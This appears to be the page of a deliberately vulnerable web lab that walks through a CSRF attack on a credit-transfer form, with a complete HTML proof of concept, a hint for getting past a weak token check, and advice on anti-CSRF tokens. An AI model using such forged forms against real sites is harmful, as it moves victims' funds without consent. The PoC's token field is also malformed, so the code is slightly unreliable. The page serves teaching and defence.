Show Instructions

Instructions:

  1. Creating an Account:
    • Navigate to the "Register" section.
    • Enter a unique username.
    • Enter a password.
    • Click on the "Register" button.
    • If successful, you will see a message saying "Registration successful!".
  2. Logging In:
    • Navigate to the "Login" section.
    • Enter the username and password you registered with.
    • Click on the "Login" button.
    • If successful, you will see options for transferring credits and your current credit balance.
  3. Creating a CSRF PoC: CSRF is a type of attack where an attacker tricks a victim into performing an unwanted action on a website where they're authenticated, usually without the victim's knowledge or consent. In this exercise, we'll demonstrate a simple CSRF attack by creating a form that can transfer credits from a logged-in user's account to another user without their knowledge. To find the exploit, try entering a CSRF token of the same length and adding it to the HTML PoC.
    <!DOCTYPE html>
            <html lang="en">
            <head>
                <meta charset="UTF-8">
                <meta http-equiv="X-UA-Compatible" content="IE=edge">
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
                <title>CSRF PoC</title>
            </head>
            <body>
    
            <h2>CSRF Attack Example</h2>
    
            <p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>
    
            <form action="TARGET_URL" method="post">
                <input type="hidden" name="receiver" value="user1">
                <input type="hidden" name="amount" value="100">
                <input type="csrf_token" name="amount" value="........">
    
                <input type="submit" value="Click me for a surprise!">
            </form>
    
            </body>
            </html>
            
    • Create an HTML page with the necessary form.
    • Replace `TARGET_URL` with the URL where the original PHP page is hosted.
    • When a logged-in user visits this crafted page and clicks on the provided button, credits will be transferred without their direct consent.
  4. Testing the CSRF PoC:
    • Log in to the original PHP website with any user account (e.g., user2).
    • Visit the crafted CSRF PoC HTML page you created.
    • Click on the provided button.
    • Go back to the original PHP website and check the credits of the logged-in user and `user1`. You should notice that credits have been transferred.
  5. Protecting Against CSRF: Implementing anti-CSRF tokens is a common measure to prevent CSRF attacks. With this mechanism, every form submission requires a unique token. Without the correct token, the server will reject the request.
    • Generate a unique token for every form displayed to the user.
    • Store this token in the user's session and also send it as a hidden field in the form.
    • On form submission, compare the token from the form with the one in the user's session. If they match, process the request. If not, reject it.
    • This ensures that only forms generated by your website can be used to submit data, preventing attackers from creating malicious forms to exploit CSRF vulnerabilities.
Hide Instructions

Register

Username:

Password:

Login

Username:

Password:

Users and Credits

Username Credits
user1 5000
user2 4500
user3 4000